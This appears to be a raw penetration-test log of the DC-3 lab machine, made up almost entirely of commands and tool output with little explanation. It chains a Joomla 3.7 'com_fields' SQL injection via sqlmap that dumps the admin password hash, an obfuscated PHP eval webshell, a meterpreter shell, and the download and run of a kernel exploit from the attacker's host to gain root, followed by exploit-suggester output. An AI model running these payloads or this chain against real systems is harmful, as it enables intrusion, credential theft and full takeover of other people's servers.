└─# nikto -h 172.16.10.31           - Nikto v2.5.0---------------------------------------------------------------------------+ Target IP:          172.16.10.31+ Target Hostname:    172.16.10.31+ Target Port:        80+ Start Time:         2024-01-02 20:19:35 (GMT8)---------------------------------------------------------------------------+ Server: Apache/2.4.18 (Ubuntu)    + /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/+ /images: IP address found in the 'location' header. The IP is "127.0.1.1". See: https://portswigger.net/kb/issues/00600300_private-ip-addresses-disclosed+ /images: The web server may reveal its internal or real IP in the Location header via a request to with HTTP/1.0. The value is "127.0.1.1". See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0649+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.+ /: DEBUG HTTP verb may show server debugging information. See: https://docs.microsoft.com/en-us/visualstudio/debugger/how-to-enable-debugging-for-aspnet-applications?view=vs-2017+ /index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc: EW FileManager for PostNuke allows arbitrary file retrieval. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2047+ /administrator/: This might be interesting.+ /bin/: This might be interesting.+ /includes/: This might be interesting.+ /tmp/: This might be interesting.+ /LICENSE.txt: License file found may identify site software.+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/+ /htaccess.txt: Default Joomla! htaccess.txt file found. This should be removed or renamed.+ /administrator/index.php: Admin login page/section found.+ 8910 requests: 0 error(s) and 16 item(s) reported on remote host+ End Time:           2024-01-02 20:19:55 (GMT8) (20 seconds)---------------------------------------------------------------------------+ 1 host(s) tested

172.16.10.31 / 172.16.10.31 port 80
Target IP      172.16.10.31
Target hostname      172.16.10.31
Target Port      80    
HTTP Server      Apache/2.4.18 (Ubuntu)
Site Link (Name)      http://172.16.10.31:80/
Site Link (IP)      http://172.16.10.31:80/
URI      /
HTTP Method      GET
Description      /: The anti-clickjacking X-Frame-Options header is not present.
Test Links      http://172.16.10.31:80/
http://172.16.10.31:80/
References      X-Frame-Options - HTTP | MDN
URI      /
HTTP Method      GET
Description      /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type.
Test Links      http://172.16.10.31:80/
http://172.16.10.31:80/
References      Missing Content-Type Header Detected on Web Application | Invicti
URI      /images
HTTP Method      GET
Description      /images: IP address found in the 'location' header. The IP is "127.0.1.1".
Test Links      http://172.16.10.31:80/images
http://172.16.10.31:80/images
References      Private IP addresses disclosed - PortSwigger
URI      /images
HTTP Method      GET
Description      /images: The web server may reveal its internal or real IP in the Location header via a request to with HTTP/1.0. The value is "127.0.1.1".
Test Links      http://172.16.10.31:80/images
http://172.16.10.31:80/images
References      CVE-2000-0649
URI      /
HTTP Method      HEAD
Description      Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
Test Links      http://172.16.10.31:80/
http://172.16.10.31:80/
References     
URI      /
HTTP Method      ULIJVHGE
Description      /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
Test Links      http://172.16.10.31:80/
http://172.16.10.31:80/
References         
URI      /
HTTP Method      DEBUG
Description      /: DEBUG HTTP verb may show server debugging information.
Test Links      http://172.16.10.31:80/
http://172.16.10.31:80/
References      Enable debugging for ASP.NET apps - Visual Studio | Microsoft Learn
URI      /index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc
HTTP Method      GET
Description      /index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc: EW FileManager for PostNuke allows arbitrary file retrieval.
Test Links      http://172.16.10.31:80/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc
http://172.16.10.31:80/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc
References      CVE-2004-2047
URI      /administrator/
HTTP Method      GET
Description      /administrator/: This might be interesting.
Test Links      http://172.16.10.31:80/administrator/
http://172.16.10.31:80/administrator/
References     
URI      /bin/
HTTP Method      GET
Description      /bin/: This might be interesting.
Test Links      http://172.16.10.31:80/bin/
http://172.16.10.31:80/bin/
References     
URI      /includes/
HTTP Method      GET
Description      /includes/: This might be interesting.
Test Links      http://172.16.10.31:80/includes/
http://172.16.10.31:80/includes/
References     
URI      /tmp/
HTTP Method      GET
Description      /tmp/: This might be interesting.
Test Links      http://172.16.10.31:80/tmp/
http://172.16.10.31:80/tmp/
References     
URI      /LICENSE.txt
HTTP Method      GET
Description      /LICENSE.txt: License file found may identify site software.    
Test Links      http://172.16.10.31:80/LICENSE.txt
http://172.16.10.31:80/LICENSE.txt
References     
URI      /icons/README
HTTP Method      GET
Description      /icons/README: Apache default file found.
Test Links      http://172.16.10.31:80/icons/README
http://172.16.10.31:80/icons/README
References      https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
URI      /htaccess.txt
HTTP Method      GET
Description      /htaccess.txt: Default Joomla! htaccess.txt file found. This should be removed or renamed.
Test Links      http://172.16.10.31:80/htaccess.txt
http://172.16.10.31:80/htaccess.txt
References     
URI      /administrator/index.php
HTTP Method      GET
Description      /administrator/index.php: Admin login page/section found.
Test Links      http://172.16.10.31:80/administrator/index.php
http://172.16.10.31:80/administrator/index.php
References     
Host Summary
Start Time      2024-01-02 20:45:40
End Time      2024-01-02 20:46:00
Elapsed Time      20 seconds
Statistics      8910 requests, 0 errors, 16 findings
Scan Summary
Software Details      Nikto 2.5.0
CLI Options      -h 172.16.10.31 -Format html -o nikto_report.html
Hosts Tested      1
Start Time      Tue Jan 2 20:45:40 2024
End Time      Tue Jan 2 20:46:00 2024
Elapsed Time      20 seconds    

└─# searchsploit joomla | grep 3.7
Joomla! 1.5.x - 404 Error Page Cross-Site Scripting                                                        | php/webapps/33378.txt
Joomla! 3.4.4 Component Content History - SQL Injection / Remote Code Execution (Metasploit)               | php/remote/38797.rb
Joomla! 3.7 - SQL Injection                                                                                | php/remote/44227.php
Joomla! 3.7.0 - 'com_fields' SQL Injection                                                                 | php/webapps/42033.txt
Joomla! Component actualite 1.0 - 'id' SQL Injection                                                       | php/webapps/5337.txt
Joomla! Component ARI Quiz 3.7.4 - SQL Injection                                                           | php/webapps/46769.txt
Joomla! Component CCNewsLetter 2.1.9 - 'sbid' SQL Injection                                                | php/webapps/42387.txt
Joomla! Component Cmimarketplace - 'viewit' Directory Traversal                                            | php/webapps/8367.txt
Joomla! Component com_alert - 'q_item' SQL Injection                                                       | php/webapps/33771.txt
Joomla! Component com_aml_2 - 'art' SQL Injection                                                          | php/webapps/33795.txt
Joomla! Component com_as - 'catid' SQL Injection                                                           | php/webapps/33766.txt
Joomla! Component com_cb - 'cat' SQL Injection                                                             | php/webapps/33796.txt
Joomla! Component com_cbcontact - 'contact_id' SQL Injection                                               | php/webapps/35745.txt    
Joomla! Component com_d-greinar - 'maintree' Cross-Site Scripting                                          | php/webapps/33757.txt
Joomla! Component com_facegallery 1.0 - Multiple Vulnerabilities                                           | php/webapps/34754.py
Joomla! Component com_informations - SQL Injection                                                         | php/webapps/37774.txt
Joomla! Component com_jem 2.1.4 - Multiple Vulnerabilities                                                 | multiple/webapps/37767.txt
Joomla! Component com_jphoto - 'id' SQL Injection                                                          | php/webapps/10367.txt
Joomla! Component com_jresearch - 'Controller' Local File Inclusion                                        | php/webapps/33797.txt
Joomla! Component com_macgallery 1.5 - Arbitrary File Download                                             | php/webapps/34755.py
Joomla! Component com_memorix - SQL Injection                                                              | php/webapps/37773.txt
Joomla! Component com_photoblog - Blind SQL Injection                                                      | php/webapps/11337.txt
Joomla! Component com_realestatemanager 3.7 - SQL Injection                                                | php/webapps/38445.txt
Joomla! Component com_seek - 'id' SQL Injection                                                            | php/webapps/33756.txt
Joomla! Component com_shop - SQL Injection                                                                 | php/webapps/35797.txt
Joomla! Component com_tax - 'eid' SQL Injection                                                            | php/webapps/34708.pl
Joomla! Component com_ybggal 1.0 - 'catid' SQL Injection                                                   | php/webapps/13979.txt
Joomla! Component DM Orders - 'id' SQL Injection                                                           | php/webapps/33474.txt
Joomla! Component EShop 2.5.1 - 'id' SQL Injection                                                         | php/webapps/41387.txt
Joomla! Component HD FLV Player - 'id' SQL Injection                                                       | php/webapps/33673.pl
Joomla! Component J2Store < 3.3.7 - SQL Injection                                                          | php/webapps/46467.txt
Joomla! Component JE auction 1.6 - 'eid' SQL Injection                                                     | php/webapps/41337.txt
Joomla! Component JE Messanger - SQL Injection                                                             | php/webapps/41347.txt
Joomla! Component jLike 1.0 - Information Leak                                                             | php/webapps/43977.php
Joomla! Component Job - SQL Injection                                                                      | php/webapps/11307.txt    
Joomla! Component Jobads - 'type' SQL Injection                                                            | php/webapps/33478.txt
Joomla! Component JomEstate PRO 3.7 - 'id' SQL Injection                                                   | php/webapps/44117.txt
Joomla! Component JoomRecipe 1.0.4 - 'search_author' SQL Injection                                         | php/webapps/42347.txt
Joomla! Component JSP Tickets 1.1 - SQL Injection                                                          | php/webapps/43978.txt
Joomla! Component Jtag Members Directory 5.3.7 - Arbitrary File Download                                   | php/webapps/43913.txt
Joomla! Component JVideoClip 1.5.1 - 'uid' SQL Injection                                                   | php/webapps/38777.txt
Joomla! Component Map Locator - 'cid' SQL Injection                                                        | php/webapps/35788.txt
Joomla! Component OrgChart 1.0.0 - Local File Inclusion                                                    | php/webapps/12317.txt
Joomla! Component ProofReader 1.0 RC9 - Cross-Site Scripting                                               | php/webapps/33377.txt
Joomla! Component Quiz Deluxe 3.7.4 - SQL Injection                                                        | php/webapps/42589.txt
Joomla! Component Rapid-Recipe - Persistent Cross-Site Scripting                                           | php/webapps/14327.txt
Joomla! Component RSfiles 1.0.2 - 'path' File Download                                                     | php/webapps/4307.txt
Joomla! Component Soccer Bet 4.1.5 - 'cat' SQL Injection                                                   | php/webapps/41327.txt
Joomla! Component Sponsor Wall 1.1 - SQL Injection                                                         | php/webapps/15367.txt
Joomla! Component User Bench 1.0 - 'userid' SQL Injection                                                  | php/webapps/43357.txt
Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion                              | php/webapps/31708.txt
Joomla! Component Zh BaiduMap 3.0.0.1 - SQL Injection                                                      | php/webapps/43974.txt
Joomla! Component Zh GoogleMap 8.4.0.0 - SQL Injection                                                     | php/webapps/43976.txt
Joomla! Component Zh YandexMap 6.2.1.0 - 'id' SQL Injection                                                | php/webapps/43975.html

 Using Sqlmap: sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

[21:09:45] [INFO] fetching database names[21:09:45] [INFO] retrieved: 'information_schema'[21:09:45] [INFO] retrieved: 'joomladb'[21:09:45] [INFO] retrieved: 'mysql'[21:09:45] [INFO] retrieved: 'performance_schema'[21:09:45] [INFO] retrieved: 'sys'available databases [5]:[*] information_schema[*] joomladb[*] mysql[*] performance_schema[*] sys

 Database: joomladb[76 tables]+---------------------+| #__assets           || #__associations     || #__banner_clients   || #__banner_tracks    || #__banners          || #__bsms_admin       || #__bsms_books       || #__bsms_comments    || #__bsms_locations   || #__bsms_mediafiles  || #__bsms_message_typ || #__bsms_podcast     || #__bsms_series      || #__bsms_servers     || #__bsms_studies     || #__bsms_studytopics || #__bsms_teachers    |    | #__bsms_templatecod || #__bsms_templates   || #__bsms_timeset     || #__bsms_topics      || #__bsms_update      || #__categories       || #__contact_details  || #__content_frontpag || #__content_rating   || #__content_types    || #__content          || #__contentitem_tag_ || #__core_log_searche || #__extensions       || #__fields_categorie || #__fields_groups    || #__fields_values    || #__fields           || #__finder_filters   || #__finder_links_ter || #__finder_links     || #__finder_taxonomy_ || #__finder_taxonomy  || #__finder_terms_com || #__finder_terms     || #__finder_tokens_ag || #__finder_tokens    || #__finder_types     || #__jbsbackup_timese || #__jbspodcast_times || #__languages        || #__menu_types       || #__menu             || #__messages_cfg     || #__messages         || #__modules_menu     || #__modules          || #__newsfeeds        || #__overrider        || #__postinstall_mess || #__redirect_links   || #__schemas          || #__session          || #__tags             |    | #__template_styles  || #__ucm_base         || #__ucm_content      || #__ucm_history      || #__update_sites_ext || #__update_sites     || #__updates          || #__user_keys        || #__user_notes       || #__user_profiles    || #__user_usergroup_m || #__usergroups       || #__users            || #__utf8_conversion  || #__viewlevels       |+---------------------+

Database: joomladbTable: #__users[6 columns]+----------+-------------+| Column   | Type        |+----------+-------------+| name     | non-numeric || email    | non-numeric || id       | numeric     || params   | non-numeric || password | non-numeric || username | non-numeric |+----------+-------------+

Database: joomladbTable: #__users[1 entry]+----------+--------------------------------------------------------------+| username | password                                                     |+----------+--------------------------------------------------------------+    | admin    | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |+----------+--------------------------------------------------------------+

@error_reporting(0);function Decrypt($data){    $key="e45e329feb5d925b";     $bs="base64_"."decode";      $after=$bs($data."");      for($i=0;$i          $after[$i] = $after[$i]^$key[$i+1&15];    }    return $after;}$post=Decrypt(file_get_contents("php://input"));eval($post);?>

meterpreter > shellProcess 1752 created.Channel 0 created.python -c "import pty;pty.spawn('/bin/bash')"www-data@DC-3:/var/www/html/templates/beez3$www-data@DC-3:/var/www/html/templates/beez3$ whoamiwhoamiwww-datawww-data@DC-3:/var/www/html/templates/beez3$ ididuid=33(www-data) gid=33(www-data) groups=33(www-data)

Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation               | linux/local/39772.txt

www-data@DC-3:/var/www/html/templates/beez3$ wget http://172.16.10.13:8081/39772.zip--2024-01-04 13:41:07--  http://172.16.10.13:8081/39772.zipConnecting to 172.16.10.13:8081... connected.HTTP request sent, awaiting response... 200 OKLength: 7025 (6.9K) [application/zip]Saving to: '39772.zip'           39772.zip           100%[===================>]   6.86K  --.-KB/s    in 0s                2024-01-04 13:41:07 (883 MB/s) - '39772.zip' saved [7025/7025]           www-data@DC-3:/var/www/html/templates/beez3$ mv 39772.zip /tmpmv 39772.zip /tmpwww-data@DC-3:/var/www/html/templates/beez3$ cd /tmpcd /tmpwww-data@DC-3:/tmp$ lsls39772.zipsystemd-private-243bd71fbb09439dab71dc9493bf7f2f-systemd-timesyncd.service-jwvQNDvmware-rootwww-data@DC-3:/tmp$ unzip 39772.zipunzip 39772.zipArchive:  39772.zip   creating: 39772/  inflating: 39772/.DS_Store           creating: __MACOSX/   creating: __MACOSX/39772/  inflating: __MACOSX/39772/._.DS_Store   inflating: 39772/crasher.tar        inflating: __MACOSX/39772/._crasher.tar   inflating: 39772/exploit.tar        inflating: __MACOSX/39772/._exploit.tar www-data@DC-3:/tmp$ lsls    3977239772.zip__MACOSXsystemd-private-243bd71fbb09439dab71dc9493bf7f2f-systemd-timesyncd.service-jwvQNDvmware-rootwww-data@DC-3:/tmp$ cd 39772cd 39772www-data@DC-3:/tmp/39772$ lslscrasher.tar  exploit.tarwww-data@DC-3:/tmp/39772$ tar -xzvf exploit.tartar -xzvf exploit.tar           gzip: stdin: not in gzip formattar: Child returned status 1tar: Error is not recoverable: exiting nowwww-data@DC-3:/tmp/39772$ tar -xvf exploit.tartar -xvf exploit.tarebpf_mapfd_doubleput_exploit/ebpf_mapfd_doubleput_exploit/hello.cebpf_mapfd_doubleput_exploit/suidhelper.cebpf_mapfd_doubleput_exploit/compile.shebpf_mapfd_doubleput_exploit/doubleput.cwww-data@DC-3:/tmp/39772$ cd ebpf_mapfd_doubleput_exploit/cd ebpf_mapfd_doubleput_exploit/www-data@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit$ chmod +x compile.shchmod +x compile.shwww-data@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh./compile.sh               ^www-data@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit$ chmod +x doubleputchmod +x doubleputwww-data@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput./doubleputstarting writevwoohoo, got pointer reusewritev returned successfully. if this worked, you'll have a root shell in <=60 seconds.suid file detected, launching rootshell...we have root privs now...root@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit# whoamiwhoamiroot    root@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit# ididuid=0(root) gid=0(root) groups=0(root),33(www-data)root@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit#

www-data@DC-3:/tmp$ wget http://172.16.10.13:8081/dajun.shwget http://172.16.10.13:8081/dajun.sh--2024-01-04 14:18:42--  http://172.16.10.13:8081/dajun.shConnecting to 172.16.10.13:8081... connected.HTTP request sent, awaiting response... 200 OKLength: 90934 (89K) [text/x-sh]Saving to: 'dajun.sh'           dajun.sh            100%[===================>]  88.80K  --.-KB/s    in 0.005s            2024-01-04 14:18:42 (16.6 MB/s) - 'dajun.sh' saved [90934/90934]

www-data@DC-3:/tmp$ chmod +x dajun.shchmod +x dajun.shwww-data@DC-3:/tmp$ ./dajun.sh./dajun.sh           Available information:           Kernel version: 4.4.0Architecture: i686Distribution: ubuntu    Distribution version: 16.04Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performedPackage listing: from current OS           Searching among:           81 kernel space exploits49 user space exploits           Possible Exploits:           cat: write error: Broken pipecat: write error: Broken pipecat: write error: Broken pipecat: write error: Broken pipecat: write error: Broken pipecat: write error: Broken pipecat: write error: Broken pipecat: write error: Broken pipecat: write error: Broken pipecat: write error: Broken pipecat: write error: Broken pipe[+] [CVE-2016-5195] dirtycow 2              Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails   Exposure: highly probable   Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},[ ubuntu=16.04{kernel:4.4.0-21-generic} ]   Download URL: https://www.exploit-db.com/download/40839   ext-url: https://www.exploit-db.com/download/40847   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh           [+] [CVE-2017-16995] eBPF_verifier              Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html   Exposure: highly probable   Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},[ ubuntu=(16.04|17.04) ]{kernel:4.(8|10).0-(19|28|45)-generic}   Download URL: https://www.exploit-db.com/download/45010       Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1           [+] [CVE-2016-8655] chocobo_root              Details: http://www.openwall.com/lists/oss-security/2016/12/06/1   Exposure: highly probable   Tags: [ ubuntu=(14.04|16.04){kernel:4.4.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic} ]   Download URL: https://www.exploit-db.com/download/40871   Comments: CAP_NET_RAW capability is needed OR CONFIG_USER_NS=y needs to be enabled           [+] [CVE-2016-5195] dirtycow              Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails   Exposure: highly probable   Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ]   Download URL: https://www.exploit-db.com/download/40611   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh           [+] [CVE-2016-4557] double-fdput()              Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=808   Exposure: highly probable   Tags: [ ubuntu=16.04{kernel:4.4.0-21-generic} ]   Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39772.zip   Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1           [+] [CVE-2021-4034] PwnKit              Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt   Exposure: probable   Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro       Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main           [+] [CVE-2021-3156] sudo Baron Samedit 2              Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt   Exposure: probable   Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main           [+] [CVE-2017-7308] af_packet              Details: https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html   Exposure: probable   Tags: [ ubuntu=16.04 ]{kernel:4.8.0-(34|36|39|41|42|44|45)-generic}   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-7308/poc.c   Comments: CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at 'ext-url' adds support for additional kernels           [+] [CVE-2017-6074] dccp              Details: http://www.openwall.com/lists/oss-security/2017/02/22/3   Exposure: probable   Tags: [ ubuntu=(14.04|16.04) ]{kernel:4.4.0-62-generic}   Download URL: https://www.exploit-db.com/download/41458   Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass           [+] [CVE-2017-1000112] NETIF_F_UFO              Details: http://www.openwall.com/lists/oss-security/2017/08/13/1   Exposure: probable   Tags: ubuntu=14.04{kernel:4.4.0-*},[ ubuntu=16.04 ]{kernel:4.8.0-*}   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112/poc.c       ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-1000112/poc.c   Comments: CAP_NET_ADMIN cap or CONFIG_USER_NS=y needed. SMEP/KASLR bypass included. Modified version at 'ext-url' adds support for additional distros/kernels           [+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)              Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/   Exposure: less probable   Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}   Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)           [+] [CVE-2022-2586] nft_object UAF              Details: https://www.openwall.com/lists/oss-security/2022/08/29/5   Exposure: less probable   Tags: ubuntu=(20.04){kernel:5.12.13}   Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)           [+] [CVE-2021-3156] sudo Baron Samedit              Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt   Exposure: less probable   Tags: mint=19,ubuntu=18|20, debian=10   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main           [+] [CVE-2021-22555] Netfilter heap out-of-bounds write              Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html   Exposure: less probable   Tags: ubuntu=20.04{kernel:5.8.0-*}       Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c   Comments: ip_tables kernel module must be loaded           [+] [CVE-2019-18634] sudo pwfeedback              Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/   Exposure: less probable   Tags: mint=19   Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c   Comments: sudo configuration requires pwfeedback to be enabled.           [+] [CVE-2019-15666] XFRM_UAF              Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc   Exposure: less probable   Download URL:   Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled           [+] [CVE-2017-5618] setuid screen v4.5.0 LPE              Details: https://seclists.org/oss-sec/2017/q1/184   Exposure: less probable   Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154           [+] [CVE-2016-9793] SO_{SND|RCV}BUFFORCE              Details: https://github.com/xairy/kernel-exploits/tree/master/CVE-2016-9793   Exposure: less probable   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-9793/poc.c   Comments: CAP_NET_ADMIN caps OR CONFIG_USER_NS=y needed. No SMEP/SMAP/KASLR bypass included. Tested in QEMU only           [+] [CVE-2016-2384] usb-midi              Details: https://xairy.github.io/blog/2016/cve-2016-2384       Exposure: less probable   Tags: ubuntu=14.04,fedora=22   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384/poc.c   Comments: Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user           [+] [CVE-2016-0728] keyring              Details: http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/   Exposure: less probable   Download URL: https://www.exploit-db.com/download/40003   Comments: Exploit takes about ~30 minutes to run. Exploit is not reliable, see: https://cyseclabs.com/blog/cve-2016-0728-poc-not-working